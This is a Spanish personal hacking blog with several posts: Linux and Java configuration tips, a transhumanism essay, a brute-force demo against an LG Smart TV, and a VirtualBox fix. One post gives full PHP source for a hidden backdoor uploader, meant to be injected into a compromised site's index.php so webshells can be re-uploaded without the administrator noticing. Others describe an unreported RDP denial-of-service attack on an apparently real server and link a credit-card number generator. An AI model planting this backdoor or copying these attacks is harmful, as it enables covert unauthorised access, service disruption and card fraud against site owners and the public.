4 jun. 2016

Problemas de renderización en java (LINUX)

Hola a todos, tratando de continuar un proyecto escolar de java en mi equipo con linux (Debian jessie) en el cual uso Graphics2D y varios hilos que repintan el frame cada tantos milisegundos me dí cuenta que las animaciones se vuelven bastante lentas e irregulares. La manera mas sencilla que encontré para poder visualizar las animaciones de forma correcta fue agregar la siguiente linea de código al principio del main() la cual habilita la aceleración por hardware y de esa manera la aplicación renderizara los gráficos usando OpenGL.


System.setProperty("sun.java2d.opengl","True");

Una vez hecho esto veremos nuestro programa ejecutándose de manera totalmente fluida. Adjunto la configuración del compositor de mi sistema.


19 may. 2015

Fuerza bruta a Smart TV

En este video muestro la ejecución de un ataque de fuerza bruta agresivo a una Smart TV LG para conseguir su PairingKey que es la que nos permite controlar totalmente la televisión. Aunque es solo una demostración esto podría utilizarse para espionaje con los televisores que poseen cámara y micrófono.


11 ene. 2015

TRASCENDENCIA | SINGULARIDAD | TRANSHUMANISM




La singularidad tecnologica/trascendencia humana es un tema sumamente interesante para los que nos identificamos con la cultura cyberpunk y estoy seguro que aun mas los que estamos sumergidos en el mundo del hacking. Conocí este tema cuando vi la película Trascendence y en realidad cuando la termine de ver me plantee varias preguntas tanto tecnológicas como filosóficas que son de nunca encontrar una respuesta concreta, como por ejemplo ¿La humanidad sera capaz de seguir jugando a ser Dios y alcanzar la inmortalidad?, ¿La conciencia humana podrá subirse a un ordenador y ese mismo podrá emular la voluntad de esa persona?, ¿Tenemos alma? y si es así ¿en donde se encuentra? ... Como ven es un tema sumamente profundo.

¿De que se trata?

La singularidad tecnologica se rige bajo la ley de Moore que dice que el potencial de los microchips se duplicara cada 2 años (o menos), de manera que hay un crecimiento exponencial en el desarrollo tecnologico, y es cosa que se ha estando viendo como por ejemplo como llegamos de conectarnos de un modem de 56kbps a estos dias que es posible transmitir datos a traves de focos led a una velocidad de 10gbps, protesis roboticas, desarrollos de inteligencia artificial, etc. A lo que lleva la siguiente parte de la ley de Moore donde expone que va a llegar el punto en que la tecnologia avance tan rapido y sea tan potente que para el cerebro humano va a ser imposible darle alcance para seguirla estudiando, al menos que aumentemos nuestra propia inteligencia.







El transhumanismo es la idea de poder utilizar la ciencia y la tecnología para aumentar nuestras capacidades como inteligencia, bienestar y longevidad, esto se puede ver desde 2 puntos de vista diferentes aunque hay que ser muy de mente abierta para poder aceptarlos, los cuales son:

1) El transhumanismo puede ser lo mas peligroso para la humanidad.
2) El transhumanismo nos llevara a una nueva era (posthumanismo) sin la limitacion de la inteligencia humana y superando nuestras capacidades fisicas.



Para que esto sea posible la humanidad debe poder crear una inteligencia artificial que iguale la inteligencia humana y después esta inteligencia se reprograme a si sola para superarse. Suponiendo que la conciencia humana sean algoritmos sumamente complejos, estos podrían ser descargados por esta IA y guardados en una computadora para posteriormente sean reprogramados y asi obtener nuevas capacidades (Como en Matrix jaja).

A mediados del año pasado se dio a conocer una noticia donde el científico Stephen Hawking advertía sobre el peligro que significaba la inteligencia artificial para la humanidad y expone que las maquinas inteligentes podrían rediseñarse por su cuenta y llegar a un nivel superior al de la humanidad.


Si bien hay muchos riesgos que esto implica como el mal uso de las tecnologías para que en lugar de que nos beneficien, nos hagan daño o simplemente algun error en la programacion nos mate. Se que a respuesta del parrafo anterior se puede dar una respuesta como "Leyes de la robotica", o incluso los protocolos que aplican en la pelicula "Automata" que son: 
1°-No dañar a un ser humano
2°-Las maquinas no pueden modificarse o modificar otras maquinas (repararse o mejorarse)

Tal vez pueden decir que la preocupacion del cientifico Hawking es adelantada pero en realidad es de discutirse ya que la inteligencia artificial esta evolucionando a gran velocidad, como prueba de esto enlistare algunos desarrollos tecnologicos:


A todo esto también hay que sumarle otras tecnologías como los son la biotecnología, nanotecnologia, física cuántica y proyectos los cuales pienso que seran un inicio para que se comienze a usar la tecnologia en los humanos como por ejemplo el proyecto Mars One que pretende establecer una colonia en Marte.

...

Bien, todo esto es muy extenso para exponerlo en un solo post pero al menos espero haberles sembrado curiosidad sobre este tema, y para terminar les dejo 2 links para que los visiten y sigan indagando en este tema tan extenso.

Cortometraje de solo 4 minutos de lo que podría convertirse la humanidad en un futuro (con mucha ciencia ficcion también) pero muestra como seria si pudiéramos guardar nuestros recuerdos en la nube.




Y para terminar les dejo un videoblog mucho mas completo que este post, realizado por otra amiga: AIKA





[LINKS]
http://codenameaika.blogspot.mx/
[/LINKS]

Fin del post, saludos a todos.
StOrMd[4]rk



4 jul. 2013

Forma fácil de asegurar nuestro regreso a un hackedhost

Hi everyone!


En mis ratos de gray hat eh estado en situaciones que logro acceder a algún host y simplemente dejo una shell en algún subdirectorio (sin hacer ningún daño ni tampoco reportando ningún bug), pero días después cuando quiero regresar y husmear un poco me topo con que mi shell ya fue removida y pues tendría que volver a ganar acceso oootraveeezz...

Para evitar esto y hacer las cosas un poco mas sencillas me hice un script en php que prácticamente es un uploader protegido por asi decirlo, ya que se debe mandar una variable por get para poder visualizar el campo de login y una vez logeado ya nos da permiso de subir nuestra webshell, obviamente este script es para inyectarlo en alguna pagina propia del servidor y así el administrador no vea archivos agregados.

El chiste seria: ganar acceso al host -> poner el script en alguna pagina, talves en el mismo index.php -> una vez que terminemos de usar nuestra shell, borrarla con la función self-remove
 ..y así cada vez que queramos usar la shell, la subimos, la usamos y la borramos, de esta manera ya es un poco mas seguro de que el administrador no se de cuenta que lo hemos owneado.

code:

<?php 
session_start(); /* cyber-oxyde.blogspot.mx */
$me="21232f297a57a5a743894a0e4a801fc3"; //user en md5 | default: admin 
$password="21232f297a57a5a743894a0e4a801fc3"; //pass en md5 | default: admin 
$getvar="stormdark"; //variable GET para activar el formulario | index.php?$getvar 
$close="close"; // variable para cerrar sesion | index.php?$getvar=$close 
@$user=$_POST[user];
@$pass=$_POST[pass];
function subir() 
{ 
    $shellname="configfile.php"; //nombre al que va a ser renombrada la webshell 
    if(@isset($_FILES[upload])) 
    {
        if(move_uploaded_file($_FILES["upload"]["tmp_name"], $shellname)) 
        { 
            echo "<h5>Archivo <a href='$shellname'>$shellname</a> subido</h5>"; 
        }else
        { 
            echo "<h5>Error al subir archivo</h5>";
        } 
    }else
    { 
        echo ' 
        <form action="" method="post" enctype="multipart/form-data">  
        <input type="file" name="upload"><br> 
        <input type="submit">
        </form>
        '; 
    }
} 
if(isset($_GET[$getvar])) 
{ 
    if(@$_SESSION['logged']=='yes') 
    { 
        subir(); 
    }else
    {
        if(isset($user) && isset($pass))
        { 
            if($me==(md5($user)) && $password==(md5($pass)))
            {
                $_SESSION['logged']='yes';
                subir(); 
            }else
            { 
                echo "<h5>wrong!</h5>"; 
            } 
        }else
        { 
            echo ' 
            <form action="" method="post"> 
            <input type="text" name="user"><br> 
            <input type="text" name="pass"><br>
            <input type="submit" name"submit"> 
            </form>
            '; 
        }
    }
    if($_GET[$getvar]==$close)
    { 
        session_destroy();
        echo "<h5>sesion cerrada</h5>";
    };
}
?> 
Highlighted:  https://github.com/stormdark/BackdoorPHP/blob/master/backdoor.php


5 jun. 2013

Otro error con wpscan en kali ¬¬


Bueno pues otra vez me aparecio otro error en el wpscan, meeehhh...

____________________________________________________
 __          _______   _____                  
 \ \        / /  __ \ / ____|                 
  \ \  /\  / /| |__) | (___   ___  __ _ _ __  
   \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
    \  /\  /  | |     ____) | (__| (_| | | | |
     \/  \/   |_|    |_____/ \___|\__,_|_| |_| v2.0rNA

    WordPress Security Scanner by the WPScan Team
 Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________

[ERROR] The option: timeout is invalid.
Trace :
/usr/lib/ruby/vendor_ruby/ethon/multi.rb:103:in `block in set_attributes'
/usr/lib/ruby/vendor_ruby/ethon/multi.rb:101:in `each_pair'
/usr/lib/ruby/vendor_ruby/ethon/multi.rb:101:in `set_attributes'
/usr/lib/ruby/vendor_ruby/ethon/multi.rb:86:in `initialize'
/usr/lib/ruby/vendor_ruby/typhoeus/hydra.rb:95:in `new'
/usr/lib/ruby/vendor_ruby/typhoeus/hydra.rb:95:in `initialize'
/usr/share/wpscan/lib/browser.rb:48:in `new'
/usr/share/wpscan/lib/browser.rb:48:in `initialize'
/usr/share/wpscan/lib/browser.rb:62:in `new'
/usr/share/wpscan/lib/browser.rb:62:in `instance'
/usr/share/wpscan/lib/wpscan/wp_target.rb:43:in `initialize'
/usr/bin/wpscan:51:in `new'
/usr/bin/wpscan:51:in `
'


Pero ahora para tenerlo funcional tendremos que reinstalarlo con los siguientes comandos

aptitude install libcurl4-gnutls-dev libopenssl-ruby libxml2 libxml2-dev libxslt1-dev ruby-dev
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
sudo gem install bundler && bundle install --without test development

Ahora cada vez que necesitemos usar wpscan tendremos que irnos al directorio ~/wpscan y ejecutarlo ./wpscan.rb o ruby wpscan.rb

 __          _______   _____                  
 \ \        / /  __ \ / ____|                 
  \ \  /\  / /| |__) | (___   ___  __ _ _ __  
   \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
    \  /\  /  | |     ____) | (__| (_| | | | |
     \/  \/   |_|    |_____/ \___|\__,_|_| |_| v2.1rfc0373f

    WordPress Security Scanner by the WPScan Team
 Sponsored by the RandomStorm Open Source Initiative


thats all =3



22 may. 2013

Explotando vuln ms12_020


Explotando la vulnerabilidad ms12_020 del servicio RDP (remote desktop protocol) de microsoft en el puerto 3389 provocando una blue screen of dead y por ende un denial of service, almenos hasta que se reinicie el server.
Exploit utilizado: auxiliary/dos/windows/rdp/ms12_020_maxchannelids
Reportado: No
Fixed: No



Mas info acerca del bug: http://nmap.org/nsedoc/scripts/rdp-vuln-ms12-020.html

DoS attacks is lamm0, this is only a proof of concept..
Ps. sorry admin, only educational purposes.


14 may. 2013

#0x1~

Les dejo una parte del dialogo de la pelicula The Matrix que me gusto mucho..

______________________________________________________________________________________________
Mouse: -¿Sabes a lo que realmente me recuerda? – Al trigo rico, ¿alguna vez lo probaste?


Switch: - No, y técnicamente tú tampoco.


Mouse: - Y a eso me refiero exactamente. Porque si te preguntas: ¿cómo sabrán las máquinas a qué sabía en realidad el trigo rico? Quizás se equivocaron. Yo creo que el sabor del trigo rico era en realidad el sabor de la avena o quizás del atún. Eso hace que te plantees cosas. Piensa en el pollo por ejemplo, a lo mejor no supieron concretar a qué sabía el pollo y por eso hay tantas cosas que saben a pollo.
______________________________________________________________________________________________
THE MATRIX



13 may. 2013

Agregar herramientas de Kali Linux a Debian wheezy

Para agregar las herramientas de kali linux a wheezy solo necesitamos agregar los siguentes repositorios a nuestro /etc/apt/sources.list
deb http://http.kali.org/kali kali main contrib non-free
deb-src http://http.kali.org/kali kali main contrib non-free
Despues agregamos la llave publica
sudo apt-key adv --keyserver pgp.mit.edu --recv-keys ED444FF07D8D0BF6
Y finalmente actualizamos
aptitude update
Ahora cualquier herramienta que necesitemos usar estara lista para instalarse desde los repositorios
aptitude install $t00l

12 may. 2013

Script para instalar LibreOffice 4 de manera sencilla

#!/bin/bash
apt-get purge libreoffice*
apt-get remove libreoffice*
cd /tmp/
mkdir LibreOffice
cd LibreOffice
wget -c http://download.documentfoundation.org/libreoffice/stable/4.0.3/deb/x86_64/LibreOffice_4.0.3_Linux_x86-64_deb.tar.gz
wget -c http://download.documentfoundation.org/libreoffice/stable/4.0.3/deb/x86_64/LibreOffice_4.0.3_Linux_x86-64_deb_langpack_es.tar.gz
wget -c http://download.documentfoundation.org/libreoffice/stable/4.0.3/deb/x86_64/LibreOffice_4.0.3_Linux_x86-64_deb_helppack_es.tar.gz
tar xzvf LibreOffice_4.0.3_Linux_x86-64_deb.tar.gz
cd LibreOffice_4.0.3.3_Linux_x86-64_deb/DEBS/
dpkg -i *.deb
cd desktop-integration/
dpkg -i libreoffice4.0-debian-menus_4.0.3-3_all.deb
tar xzvf /tmp/LibreOffice/LibreOffice_4.0.3_Linux_x86-64_deb_langpack_es.tar.gz
cd LibreOffice_4.0.3.3_Linux_x86-64_deb_langpack_es/DEBS/
dpkg -i *.deb
tar xzvf /tmp/LibreOffice/LibreOffice_4.0.3_Linux_x86-64_deb_helppack_es.tar.gz
cd LibreOffice_4.0..3_Linux_x86-64_deb_helppack_es/DEBS/
dpkg -i *.deb
rm -R /tmp/LibreOffice
Recuerden darle permisos de ejecución y correrlo como root

11 may. 2013

Instalacion de Bumblebee | Deshabilitar Nvidia en laptops de graficos hibridos

Hi all, Bueno ya hace un buen de tiempo buscaba la manera de deshabilitar la tarjeta nvidia de mi laptop Asus n53sv, y de hecho tuve que emigrar a windows de nuevo por el problema de supercalentamiento y de mis piernas quemadas xD, pero con la resiente salida de Debian Wheezy en su version estable me dieron ganas de volver a instalar y de volver a probar suerte con esta situacion de los graficos hibridos. so...

Para empezar mis tarjetas son las siguientes
-> Intel 2nd Generation Core Processor Family Integrated Graphics Controller
-> NVIDIA GeForce GT 540M
SO-> Debian Wheezy Stable


[ ! ] Lo primero que intente, no me funciono pero talves a ustedes si.

Instalamos la aplicacion git
sudo apt-get install git

Descargamos el codigo
git clone https://github.com/mkottman/acpi_call.git
cd acpi_call

Compilamos
make

Cargamos el codigo en el kernel
sudo insmod acpi_call.ko

Nos movemos al directorio, damos permisos y cruza los dedos D= !!
cd examples
chmod 755 turn_off_gpu.sh
./turn_off_gpu.sh

Si aparece un mensaje "works!", entonces funciono y si no don't worry que a mi tampoco xD, pasemos a la siguiente opcion.. Nota, si tienes una Dell XPS 17, una Alienware M11x o una ASUS Eee PC 1215N intenta ejecutando los scripts que vienen en ese mismo directorio
./asus1215n.sh
./dellL702X.sh
./m11xr2.sh


[ ! ] Lo que me funciono, Bumblebee Project

Añadimos una llave al llavero #LOOOL

Como root:
wget -O - http://suwako.nomanga.net/suwako.asc | apt-key add -

Agregamos repositorios a nuestro sources.list
gedit /etc/apt/sources.list

Al final del archivo agregamos:
deb http://suwako.nomanga.net/debian sid main contrib
deb-src http://suwako.nomanga.net/debian sid main

Updateamos e instalamos bumblebee
aptitude update
aptitude install bumblebee bumblebee-nvidia
En el paso anterior si sale algun error de dependencias solo acepten la solucion que les ofrece el gestor.

Ahora agregamos nuestro usuario al grupo bumblebee, as fucking root:
adduser $tu_usuario bumblebee
Thats All!! =D solo queda reiniciar y si el universo esta de nuestro lado al iniciar, nuestra tarjeta nvidia estara deshabilitada, nuestra temperatura descendera y nuestra bateria durara mas =D

Si tienen alguna otra distribucion, aqui les dejo la pagina oficial del proyecto para que chequen el modo de instalacion para cada distro.



15 abr. 2013

Reparando VBox despues de un crasheo

Ayer por la noche tuve un problema con mi maquina virtual de kali y es que al apagarla se me quedo la ultima pantalla con la palabra "Will now halt..." pero solo eso, no se apagaba y pues opté por finalizar el proceso del virtualbox ahahah >=D
Pero hoy al tratar de iniciarla me aparecía esto


Inaccesible =(

El mensaje de error me decía que el archivo /Kali Linux.vbox no estaba, asi que al ir a la ruta en efecto ese archivo no estaba pero habían otros dos


Kali Linux.vbox-tmp y Kali Linux.vbox-prev, asi que renombre el archivo vbox-tmp dejandolo de la siguiente manera


Volviendo al VirtualBox y clickeando en actualizar...


Fuck yeah!, solo salio como abortada pero arrancó sin problemas =D


Moraleja: No maten el proceso de la virtualbox mientras se apaga xD.

Otra solución que también se me ocurrió era volver a hacer una maquina virtual pero al momento de crear el disco en vez de instalar el sistema operativo desde cero, decirle que use un archivo virtual disk image existente, que era el Kali Linux.vdi que todavia tenia en mi carpeta VirtualBox VMs.


11 abr. 2013

Creditcard Generator [c++]

Bueno pues ahora para pasar el rato hice un generador de tarjetas de credito a partir de un bin de 6 digitos, se puede optimizar el codigo pero pues asi funciona bien..



Descargar exe: https://www.dropbox.com/s/a9x98fv76f62nic/generador_0xyde.rar?dl=0
Código: https://github.com/stormdark/CreditCardGenerator/blob/master/generator.cpp